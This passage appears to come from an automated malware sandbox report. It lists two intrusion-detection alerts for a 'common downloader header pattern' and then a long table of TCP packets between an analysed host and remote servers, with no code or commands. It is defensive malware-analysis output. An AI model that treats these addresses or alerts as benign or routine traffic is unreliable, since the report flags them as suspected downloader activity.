                                                                                                                                2024-11-18T13:51:00.870450+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849716193.122.6.16880TCP
                                                                                                                                2024-11-18T13:51:13.473984+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849729188.114.97.3443TCP

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 18, 2024 13:50:45.532408953 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:45.532464981 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:45.532716990 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:45.812681913 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:45.812721014 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:46.668607950 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:46.668709040 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:46.669393063 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:46.669439077 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.021853924 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.021881104 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.022439003 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.022519112 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.125528097 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.171325922 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.489731073 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.489872932 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.489897013 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.489942074 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.490216970 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.490255117 CET44349709142.250.185.174192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.490305901 CET49709443192.168.2.8142.250.185.174
                                                                                                                                Nov 18, 2024 13:50:47.520709991 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:47.520756006 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.520842075 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:47.521136045 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:47.521151066 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:48.406426907 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:48.406733036 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:48.457586050 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:48.457611084 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:48.457984924 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:48.458086014 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:48.458681107 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:48.503340960 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.763850927 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.763978958 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.772828102 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.772914886 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.880530119 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.880678892 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.880697012 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.880814075 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.880938053 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.881014109 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.881050110 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.881130934 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.894010067 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.894179106 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.894207001 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.894402027 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.898684025 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.898844957 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.898859978 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.898978949 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.908263922 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.908442020 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.908461094 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.908510923 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.997359991 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.997538090 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.997565985 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.997648001 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.997786045 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.997860909 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:50.997924089 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:50.998014927 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.010694981 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.010848999 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.010873079 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.010941982 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.015374899 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.015467882 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.015506029 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.015597105 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.024907112 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.024998903 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.025134087 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.025194883 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.025213957 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.025377989 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.114224911 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.114389896 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.114418030 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.114525080 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.114530087 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.114583969 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.129523039 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.129708052 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.129734993 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.129823923 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.135113001 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.135337114 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.135364056 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.135651112 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.139066935 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.139134884 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.141885996 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.142041922 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.142093897 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.142169952 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.185180902 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.185378075 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.230835915 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.230986118 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.231004000 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.231081009 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.231290102 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.231374979 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.231383085 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.231448889 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.246335030 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.246522903 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.246525049 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.246550083 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.246599913 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.246742010 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.251759052 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.252171040 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.252192974 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.252398968 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.255943060 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.256091118 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.258758068 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.258893967 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.258990049 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.259176016 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.261025906 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.261092901 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.302272081 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.302411079 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.347744942 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.347898006 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.348119974 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.348191977 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.348320961 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.348485947 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.363171101 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.363344908 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.363356113 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.363430977 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.368514061 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.368585110 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.368679047 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.368752956 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.372865915 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.372946024 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.375540972 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.375648975 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.375730991 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.375838041 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.377942085 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.378120899 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.419238091 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.419336081 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.419352055 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.419398069 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.465090036 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.465157032 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.465392113 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.465442896 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.465455055 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.465604067 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.479870081 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.479929924 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.479950905 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.480120897 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.485475063 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.485795975 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.485810995 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.485924959 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.486148119 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.486321926 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.486329079 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.486391068 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.489423037 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.491230965 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.492392063 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.492458105 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.492548943 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.492594957 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.535729885 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.535779953 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.535830975 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.535963058 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.582855940 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.583010912 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.583044052 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.583228111 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.602489948 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.602797985 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.602816105 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603020906 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603077888 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603162050 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603168011 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603245020 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603250027 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603332043 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603956938 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.604017973 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.609349012 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.609543085 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.609549046 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.609713078 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.653305054 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.653414965 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.653466940 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.654233932 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699230909 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699326038 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699465036 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699465990 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699511051 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699580908 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699592113 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699666977 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.700059891 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.700119019 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.719700098 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.719877958 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.719906092 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.719964027 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.719974041 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.720026016 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.720032930 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.720136881 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.720794916 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.721088886 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.721096039 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.721148014 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.726257086 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.726383924 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.726578951 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.726651907 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.769736052 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.769835949 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.769871950 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.769953012 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.822846889 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.822916031 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.822993040 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.822993040 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.823033094 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.823117971 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.823359966 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.823417902 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.836385965 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.836518049 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.836544991 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.836642027 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.836745024 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.836790085 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.837147951 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.837209940 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.837234020 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.837390900 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.837661982 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.837730885 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.837763071 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.837886095 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.843116999 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.843178988 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.843339920 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.843442917 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.886681080 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.886815071 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.886848927 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.886893034 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.940066099 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.940164089 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.940190077 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.940234900 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.940511942 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.940552950 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.940562010 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.940596104 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.953052998 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.953171015 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.953190088 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.953242064 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.953367949 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.953423023 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.953726053 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.953778028 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.953787088 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.953829050 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.954359055 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.954416037 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.959845066 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.959904909 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.959969044 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.960031033 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.003621101 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.003869057 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.003890991 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.003937006 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.056915998 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.057068110 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.057081938 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.057110071 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.057143927 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.057163000 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.057638884 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.057678938 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.057899952 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.057939053 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.057948112 CET44349710172.217.16.193192.168.2.8
